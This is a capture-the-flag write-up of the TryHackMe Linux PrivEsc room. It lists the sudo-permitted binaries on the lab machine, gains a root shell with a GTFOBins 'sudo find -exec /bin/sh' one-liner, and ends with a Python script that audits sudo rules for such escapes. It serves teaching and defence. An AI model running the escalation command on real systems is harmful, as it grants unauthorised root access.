This time, we will try escalating privileges using "GTFOBins."
The target machine is from the TryHackMe room below.
"TryHackMe-Linux PrivEsc: https://tryhackme.com/room/linuxprivesc"

This article is part 3.
If you would like to read the rest of this writeup of TryHackMe's Linux PrivEsc room, please also check "Elevation of Privileges with Vulnerable File Permissions in Linux".




Preparation
Starting the target machine
First, start the target machine.
Join "TryHackMe-Linux PrivEsc: https://tryhackme.com/room/linuxprivesc".

Once an IP address is displayed, the machine has booted.

SSH connection
Connect to the target machine you started using SSH.
As explained in the room, it's OK as long as you can connect using "user:password321".
└─$ ssh user@10.10.6.35
The authenticity of host '10.10.6.35 (10.10.6.35)' can't be established.
DSA key fingerprint is SHA256:p2NSsfvYJVk1Qe0tsNX5G2h8AaWYRn71jdz3uEodbMA.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.6.35' (DSA) to the list of known hosts.
user@10.10.6.35's password:
Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Fri May 15 06:41:23 2020 from 192.168.1.125
user@debian:~$ sudo -l
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
You may need to add "-oHostKeyAlgorithms=+ssh-rsa" to the ssh command.
Elevation of Privilege using GTFOBins
Now, I would like to try escalating privileges using GTFOBins.
How many programs is "user" allowed to run via sudo?
First, I would like to list the programs that "user" can run via sudo.
The command is "sudo -l".
user@debian:~$ sudo -l
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/nano
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/bin/man
    (root) NOPASSWD: /usr/bin/awk
    (root) NOPASSWD: /usr/bin/less
    (root) NOPASSWD: /usr/bin/ftp
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/more
I found that the above 11 programs can be run via sudo.

One program on the list doesn't have a shell escape sequence on GTFOBins. Which is it?
Next, look for the program that does not have a shell escape sequence.
(In practice, I guess this means searching GTFOBins for the programs that do have a shell escape sequence.)
When I looked up each one, I found that there was none for "apache2".

The answer is "apache2".

Try elevating privileges using GTFOBins
Now let's try to actually escalate privileges.
It should be possible with any of the programs listed above other than "apache2". This time I'll try it with find.
First, search for find on GTFOBins and take a look at the Sudo section.

It seems to be just a matter of running the command, so I'll try running it.

user@debian:~$ sudo find . -exec /bin/sh \; -quit
sh-4.1# whoami
root
I have confirmed that I have actually been elevated to root.
It's really easy... Is it okay to be this simple?
Summary
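From the defender's side, the same "sudo -l" listing can be audited for this pattern. The script below is an added example, not part of the original article or of GTFOBins: the SHELL_ESCAPE set only holds the ten programs this page found on GTFOBins, the env_keep check and the severity labels are this example's own assumptions, and the sample input is the page's output shortened to five rules.

```python
import re

# Programs from this page's `sudo -l` listing that the article found to have a
# shell escape on GTFOBins (everything except apache2); not a full GTFOBins list.
SHELL_ESCAPE = {"iftop", "find", "nano", "vim", "man", "awk",
                "less", "ftp", "nmap", "more"}
RISKY_ENV = {"LD_PRELOAD", "LD_LIBRARY_PATH"}  # dynamic-loader variables
RULE = re.compile(r"\(([^)]*)\)\s*((?:[A-Z_]+:\s*)*)(.+)")

# The page's `sudo -l` output split back into lines (five of the eleven rules).
SAMPLE = """\
Matching Defaults entries for user on this host:
    env_reset, env_keep+=LD_PRELOAD, env_keep+=LD_LIBRARY_PATH
User user may run the following commands on this host:
    (root) NOPASSWD: /usr/sbin/iftop
    (root) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/vim
    (root) NOPASSWD: /usr/sbin/apache2
    (root) NOPASSWD: /bin/more
"""

def audit_sudo_l(text):
    """Return sorted (severity, item, reason) findings for `sudo -l` output."""
    findings = set()
    for var in re.findall(r"env_keep\+?=\"?([A-Z_]+)", text):
        if var in RISKY_ENV:
            findings.add(("high", var, "env_keep passes loader variable to root"))
    for line in text.splitlines():
        m = RULE.search(line)
        if not m:
            continue  # not a "(runas) [TAG:] command" rule line
        runas, tags, cmds = m.groups()
        as_root = any(u.strip() in ("root", "ALL") for u in re.split(r"[,:]", runas))
        for cmd in filter(None, (c.strip() for c in cmds.split(","))):
            path = cmd.split()[0]
            if as_root and path.rsplit("/", 1)[-1] in SHELL_ESCAPE:
                sev = "high" if "NOPASSWD:" in tags else "medium"
                findings.add((sev, path, "shell escape listed on GTFOBins"))
    return sorted(findings)

if __name__ == "__main__":
    for sev, item, reason in audit_sudo_l(SAMPLE):
        print(f"[{sev}] {item}: {reason}")
```

Every flagged path is a candidate for removal from sudoers or for replacement with a narrowly scoped wrapper that cannot spawn a shell.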
This time, we tried escalating privileges using "GTFOBins."
It was a bit of a letdown because escalating privileges was so easy, but the technique seems like one that could actually be used.
References and Sites
Medium (Shamsher khan): https://infosecwriteups.com/linux-privesc-tryhackme-writeup-bf4e32460ee5